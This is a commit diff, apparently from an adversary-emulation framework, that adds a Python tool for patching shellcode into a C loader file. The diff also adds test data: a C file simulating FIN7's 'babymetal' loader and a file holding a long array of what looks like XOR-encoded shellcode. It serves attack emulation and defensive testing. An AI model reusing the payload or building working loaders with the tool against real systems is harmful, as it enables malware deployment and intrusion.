mirror of https://github.com/avast/PurpleDome
Adding tool to patch a shellcode into a C code file
parent
85628336be
commit
d765456f39
@ -0,0 +1,3 @@
|
|||||||
|
data for the insert_shellcode tool
|
||||||
|
|
||||||
|
babymetal.cpp: A simulation of babymetal.cpp from FIN7
|
@ -0,0 +1,32 @@
|
|||||||
|
// inspired by https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp
|
||||||
|
// where the insert_shellcode.py tool is first needed
|
||||||
|
|
||||||
|
This is tricky;
|
||||||
|
C code simulation;
|
||||||
|
Must not be overwritten;
|
||||||
|
|
||||||
|
unsigned char buf[] = "Leave me be";
|
||||||
|
|
||||||
|
unsigned char buf[] =
|
||||||
|
"So not touch"
|
||||||
|
"This buf"
|
||||||
|
;
|
||||||
|
|
||||||
|
//right before
|
||||||
|
unsigned char buf[] =
|
||||||
|
"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
|
||||||
|
"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
|
||||||
|
"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
|
||||||
|
"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
|
||||||
|
;
|
||||||
|
// right after
|
||||||
|
|
||||||
|
|
||||||
|
But the shellcode must be overwritten and extended.
|
||||||
|
|
||||||
|
unsigned char buf[] = "Leave me be";
|
||||||
|
|
||||||
|
unsigned char buf[] =
|
||||||
|
"So not touch"
|
||||||
|
"This buf"
|
||||||
|
;
|
@ -0,0 +1,48 @@
|
|||||||
|
unsigned char buf[] =
|
||||||
|
"\x91\x25\xee\x89\x9d\x85\xa1\x6d\x6d\x6d\x2c\x3c\x2c\x3d\x3f"
|
||||||
|
"\x3c\x25\x5c\xbf\x08\x25\xe6\x3f\x0d\x3b\x25\xe6\x3f\x75\x25"
|
||||||
|
"\xe6\x3f\x4d\x20\x5c\xa4\x25\xe6\x1f\x3d\x25\x62\xda\x27\x27"
|
||||||
|
"\x25\x5c\xad\xc1\x51\x0c\x11\x6f\x41\x4d\x2c\xac\xa4\x60\x2c"
|
||||||
|
"\x6c\xac\x8f\x80\x3f\x2c\x3c\x25\xe6\x3f\x4d\xe6\x2f\x51\x25"
|
||||||
|
"\x6c\xbd\x0b\xec\x15\x75\x66\x6f\x62\xe8\x1f\x6d\x6d\x6d\xe6"
|
||||||
|
"\xed\xe5\x6d\x6d\x6d\x25\xe8\xad\x19\x0a\x25\x6c\xbd\x29\xe6"
|
||||||
|
"\x2d\x4d\x24\x6c\xbd\xe6\x25\x75\x3d\x8e\x3b\x25\x92\xa4\x20"
|
||||||
|
"\x5c\xa4\x2c\xe6\x59\xe5\x25\x6c\xbb\x25\x5c\xad\x2c\xac\xa4"
|
||||||
|
"\x60\xc1\x2c\x6c\xac\x55\x8d\x18\x9c\x21\x6e\x21\x49\x65\x28"
|
||||||
|
"\x54\xbc\x18\xb5\x35\x29\xe6\x2d\x49\x24\x6c\xbd\x0b\x2c\xe6"
|
||||||
|
"\x61\x25\x29\xe6\x2d\x71\x24\x6c\xbd\x2c\xe6\x69\xe5\x2c\x35"
|
||||||
|
"\x2c\x35\x33\x34\x25\x6c\xbd\x37\x2c\x35\x2c\x34\x2c\x37\x25"
|
||||||
|
"\xee\x81\x4d\x2c\x3f\x92\x8d\x35\x2c\x34\x37\x25\xe6\x7f\x84"
|
||||||
|
"\x26\x92\x92\x92\x30\x25\x5c\xb6\x3e\x24\xd3\x1a\x04\x03\x04"
|
||||||
|
"\x03\x08\x19\x6d\x2c\x3b\x25\xe4\x8c\x24\xaa\xaf\x21\x1a\x4b"
|
||||||
|
"\x6a\x92\xb8\x3e\x3e\x25\xe4\x8c\x3e\x37\x20\x5c\xad\x20\x5c"
|
||||||
|
"\xa4\x3e\x3e\x24\xd7\x57\x3b\x14\xca\x6d\x6d\x6d\x6d\x92\xb8"
|
||||||
|
"\x85\x61\x6d\x6d\x6d\x5c\x54\x5f\x43\x5c\x5b\x55\x43\x5d\x43"
|
||||||
|
"\x59\x6d\x37\x25\xe4\xac\x24\xaa\xad\xd6\x6c\x6d\x6d\x20\x5c"
|
||||||
|
"\xa4\x3e\x3e\x07\x6e\x3e\x24\xd7\x3a\xe4\xf2\xab\x6d\x6d\x6d"
|
||||||
|
"\x6d\x92\xb8\x85\xf4\x6d\x6d\x6d\x42\x32\x20\x2c\x3a\x34\x5f"
|
||||||
|
"\x1f\x32\x05\x5a\x0f\x25\x1c\x20\x0c\x1c\x1d\x5e\x5f\x5a\x14"
|
||||||
|
"\x2c\x2b\x2c\x08\x1a\x1d\x1f\x32\x07\x55\x1f\x01\x1f\x54\x3a"
|
||||||
|
"\x17\x27\x0f\x5a\x1e\x03\x05\x22\x04\x3a\x09\x21\x1f\x2a\x38"
|
||||||
|
"\x32\x02\x1d\x38\x2e\x2f\x54\x0f\x35\x3b\x28\x5f\x14\x22\x20"
|
||||||
|
"\x0e\x1c\x5a\x1d\x5c\x3b\x55\x1d\x1b\x3e\x28\x39\x1b\x5b\x27"
|
||||||
|
"\x5d\x55\x05\x26\x08\x3a\x39\x29\x25\x54\x0e\x14\x34\x1b\x07"
|
||||||
|
"\x35\x0c\x1d\x1d\x0b\x18\x0f\x05\x1f\x3d\x0f\x39\x3b\x01\x24"
|
||||||
|
"\x59\x25\x28\x2f\x27\x1e\x1f\x5c\x5a\x1b\x3e\x2f\x34\x5f\x18"
|
||||||
|
"\x35\x3d\x15\x54\x01\x23\x2b\x2b\x0e\x29\x38\x5e\x29\x04\x3a"
|
||||||
|
"\x5b\x17\x20\x37\x5c\x2c\x32\x1d\x07\x3b\x6d\x25\xe4\xac\x3e"
|
||||||
|
"\x37\x2c\x35\x20\x5c\xa4\x3e\x25\xd5\x6d\x5f\xc5\xe9\x6d\x6d"
|
||||||
|
"\x6d\x6d\x3d\x3e\x3e\x24\xaa\xaf\x86\x38\x43\x56\x92\xb8\x25"
|
||||||
|
"\xe4\xab\x07\x67\x32\x25\xe4\x9c\x07\x72\x37\x3f\x05\xed\x5e"
|
||||||
|
"\x6d\x6d\x24\xe4\x8d\x07\x69\x2c\x34\x24\xd7\x18\x2b\xf3\xeb"
|
||||||
|
"\x6d\x6d\x6d\x6d\x92\xb8\x20\x5c\xad\x3e\x37\x25\xe4\x9c\x20"
|
||||||
|
"\x5c\xa4\x20\x5c\xa4\x3e\x3e\x24\xaa\xaf\x40\x6b\x75\x16\x92"
|
||||||
|
"\xb8\xe8\xad\x18\x72\x25\xaa\xac\xe5\x7e\x6d\x6d\x24\xd7\x29"
|
||||||
|
"\x9d\x58\x8d\x6d\x6d\x6d\x6d\x92\xb8\x25\x92\xa2\x19\x6f\x86"
|
||||||
|
"\xc7\x85\x38\x6d\x6d\x6d\x3e\x34\x07\x2d\x37\x24\xe4\xbc\xac"
|
||||||
|
"\x8f\x7d\x24\xaa\xad\x6d\x7d\x6d\x6d\x24\xd7\x35\xc9\x3e\x88"
|
||||||
|
"\x6d\x6d\x6d\x6d\x92\xb8\x25\xfe\x3e\x3e\x25\xe4\x8a\x25\xe4"
|
||||||
|
"\x9c\x25\xe4\xb7\x24\xaa\xad\x6d\x4d\x6d\x6d\x24\xe4\x94\x24"
|
||||||
|
"\xd7\x7f\xfb\xe4\x8f\x6d\x6d\x6d\x6d\x92\xb8\x25\xee\xa9\x4d"
|
||||||
|
"\xe8\xad\x19\xdf\x0b\xe6\x6a\x25\x6c\xae\xe8\xad\x18\xbf\x35"
|
||||||
|
"\xae\x35\x07\x6d\x34\xd6\x8d\x70\x47\x67\x2c\xe4\xb7\x92\xb8";
|
@ -0,0 +1,60 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
# Inserts multi line shellcode into a C-file with a placeholder shellcode. Overwriting the placeholder
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
import re
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
|
||||||
|
def replace(args):
|
||||||
|
""" Replace a specified placeholder part in a file with the shellcode in the shellcode file
|
||||||
|
|
||||||
|
:param original_file:
|
||||||
|
:param placeholder_pattern:
|
||||||
|
:param shellcode_file:
|
||||||
|
:param out_file:
|
||||||
|
:return:
|
||||||
|
"""
|
||||||
|
|
||||||
|
original_file = args.original_file
|
||||||
|
placeholder_pattern = args.placeholder_pattern
|
||||||
|
shellcode_file = args.shellcode_file
|
||||||
|
out_file = args.out_file
|
||||||
|
|
||||||
|
with open(shellcode_file, "rt") as fh:
|
||||||
|
replacement = fh.read()
|
||||||
|
|
||||||
|
with open(original_file, "rt") as fh:
|
||||||
|
original = fh.read()
|
||||||
|
|
||||||
|
s = re.split(placeholder_pattern, original, maxsplit=1, flags=re.S)
|
||||||
|
print(s[0], replacement, s[1])
|
||||||
|
|
||||||
|
with open(out_file, "wt") as fh:
|
||||||
|
fh.write(s[0])
|
||||||
|
fh.write(replacement)
|
||||||
|
fh.write(s[1])
|
||||||
|
# res = re.sub(placeholder_pattern, replacement, original)
|
||||||
|
# print(res)
|
||||||
|
|
||||||
|
|
||||||
|
def create_parser():
|
||||||
|
""" Creates the parser for the command line arguments"""
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser("A tool to patch a shellcode into a C source file")
|
||||||
|
|
||||||
|
parser.set_defaults(func=replace)
|
||||||
|
parser.set_defaults(placeholder_pattern=r'unsigned char \w*\[\] =.{0,1}"\\x\d\d[^;]*".{0,1};')
|
||||||
|
parser.add_argument('--original_file', default="../tests/data/insert_shellcode/babymetal.cpp", help="The original C code with a shellcode to replace")
|
||||||
|
parser.add_argument('--shellcode_file', default="../tests/data/insert_shellcode/shellcode.c", help="The shellcode C snippet to insert into the original file")
|
||||||
|
parser.add_argument('--out_file', default="patched.c", help="The resulting patched file")
|
||||||
|
|
||||||
|
return parser
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
arguments = create_parser().parse_args()
|
||||||
|
arguments.func(arguments)
|
||||||
|
# replace("../tests/data/insert_shellcode/babymetal.cpp", r'unsigned char \w*\[\] =.{0,1}"\\x\d\d[^;]*".{0,1};', "../tests/data/insert_shellcode/shellcode.c", "result.txt")
|
Loading…
Reference in New Issue